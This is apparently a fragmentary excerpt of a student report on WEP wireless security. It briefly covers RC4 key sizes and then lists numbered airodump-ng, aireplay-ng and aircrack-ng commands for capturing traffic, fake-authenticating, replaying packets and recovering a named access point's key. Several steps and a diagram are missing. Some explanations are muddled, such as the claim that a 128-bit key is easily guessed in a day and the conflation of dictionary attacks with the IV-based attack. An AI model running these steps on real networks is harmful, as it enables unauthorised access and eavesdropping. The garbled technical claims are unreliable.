Documente Academic
Documente Profesional
Documente Cultură
2 Encryption Method
2.1 RC4 Encryption Method (balaji, 2006)
WEP uses 64 or 128-bit (revised in WEP2) key sizes and both using 24-bit IV
(initialisation vector). After subtracting the IV, what is left is 40-bit key (equivalent to 5
ASCII characters) for the 64-bit mode and 104-bit key (equivalent to 13 ASCII
characters) for the 128-bit mode.
1
Based on the diagram, these are the step-by-step encryption method for WEP security:
By gaining the access point key, someone can use it for eavesdropping of
information or even change something in the network. An attacker can rederive the
secret part by analysing the initial word of the keystreams with relatively little work
(Fluhrer, Mantin, & Shamir, 2001).
2
3.2 Dictionary-building attack that, after analysis of about a day’s worth of
traffic, allows real-time automated decryption of all traffic.
Since RC4 uses 128-bit key, it is easy for modern computer to guess the key phrase
in a day. Dictionary-building is a known attack to guess key phrase based on a bunch
of common used words. These common used words can occupy storage space of at
least 5 GB (gigabyte). So, the technique dictionary-building is to try all of the words
until it found one matches or until the dictionary’s words used up.
The attack can be used in WEP based access point by copying encrypted
packets and tries to decrypt it using the stated attack technique. If a match found, the
script will automatically try to access the access point. The faster the computer can
perform the comparison between packet and some random common words, the faster
the results.
These are the steps to compromise WEP based access point security:
3
d. ath0 is the wireless interface name
5. Wait until the last line of the terminal response get 100% (for example “09:23:39
30/30: 100%”) then proceed to the next command.
6. airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
a. -c 9 is the channel for the wireless network
b. --bssid 00:14:6C:7E:40:80 is the access point MAC address. This
eliminate extraneous traffic.
c. -w capture is file name prefix for the file which will contain the IVs.
d. ath0 is the interface name.
7. aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
a. -1 means fake authentication
b. 0 reassociation timing in seconds
c. -e teddy is the wireless network name
d. -a 00:14:6C:7E:40:80 is the access point MAC address
e. -h 00:0F:B5:88:AC:82 is our card MAC address
f. ath0 is the wireless interface name
8. aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
9. aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
a. -b 00:14:6C:7E:40:80 selects the one access point we are interested in.
This is optional since when we originally captured the data, we applied
a filter to only capture data for this one AP.
b. output*.cap selects all files starting with “output” and ending in “.cap”.
10. Now the key should be shown on the terminal (for example “KEY FOUND!
[ 12:34:56:78:90 ]”) with probability rate (Probability: 98%) of the key to match
the access point.
4
5 Reference
balaji. (2006, December 27). Wireless Security - How WEP works. Retrieved 26 April
Fluhrer, S., Mantin, I., & Shamir, A. (2001). Weaknesses in the Key Scheduling
Heidelberg. https://doi.org/10.1007/3-540-45537-X_1
https://www.aircrack-ng.org/doku.php?id=simple_wep_crack